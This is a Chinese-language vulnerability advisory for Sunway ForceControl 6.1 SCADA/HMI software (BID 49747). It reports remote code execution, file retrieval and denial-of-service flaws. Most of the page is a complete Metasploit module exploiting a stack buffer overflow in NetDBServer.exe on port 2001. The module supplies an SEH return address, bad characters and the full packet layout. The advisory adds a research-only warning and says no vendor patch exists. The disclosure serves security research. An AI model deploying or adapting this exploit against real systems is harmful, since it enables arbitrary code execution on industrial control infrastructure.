发布日期:2011-09-23
更新日期:2012-02-03受影响系统:
Sunway ForceContro 6.1 SP3
Sunway ForceContro 6.1 SP2
Sunway ForceContro 6.1 SP1
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 49747Sunway ForceControl是中文的SCADA/HMI软件。ForceControl在实现上存在多个安全漏洞,远程攻击者可能利用此漏洞在目标系统上执行任意代码,检索服务器根目录外的任意文件,造成拒绝服务。<*来源:Luigi Auriemma (aluigi@pivx.com)
链接:http://aluigi.altervista.org/adv/forcecontrol_1-adv.txt
*>测试方法:
--------------------------------------------------------------------------------
警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Luigi Auriemma (aluigi@pivx.com)提供了如下测试方法:##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require "msf/core"
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
"Name" => "Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57",
"Description" => %q{
This module exploits a stack based buffer overflow found in the SNMP
NetDBServer service of Sunway Forcecontrol <= 6.1 sp3. The overflow is
triggered when sending an overly long string to the listening service
on port 2001.
},
"Author" => [
"Luigi Auriemma", # original discovery
"Rinat Ziyayev",
"James Fitts"
],
"License" => MSF_LICENSE,
"References" =>
[
[ "BID", "49747" ],
[ "URL", "http://aluigi.altervista.org/adv/forcecontrol_1-adv.txt" ],
],
"DefaultOptions" =>
{
"EXITFUNC" => "thread",
},
"Privileged" => true,
"Payload" =>
{
"DisableNops" => "true",
"BadChars" => "x0ax0dxae",
},
"Platform" => "win",
"Targets" =>
[
[
# p/p/r ComDll.dll
"Windows", { "Ret" => 0x100022c4 }
],
],
"DefaultTarget" => 0,
"DisclosureDate" => "Sep 22 2011"))
register_options(
[
Opt::RPORT(2001)
], self.class )
end
def exploit
connect
header = "xebx50xebx50"
header << "x57x00" # packet type
header << "xffxffx00x00"
header << "x01x00"
header << "xff"
footer = "
"
packet = rand_text_alpha_upper(65535)
packet[0,header.length] = header
packet[293,8] = generate_seh_record(target.ret)
packet[301,20] = make_nops(20)
packet[321,payload.encoded.length] = payload.encoded
packet[65533,2] = footer
print_status("Trying target %s..." % target.name)
sock.put(packet)
handler
disconnect
end
end建议:
--------------------------------------------------------------------------------
厂商补丁:Sunway
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.sunwayland.com.cn/pro.aspApple iOS Libinfo组件信息泄露漏洞RoundCube Webmail “_mbox”参数跨站脚本执行漏洞相关资讯 Sunway ForceControl 本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
|
易网时代-编程资源站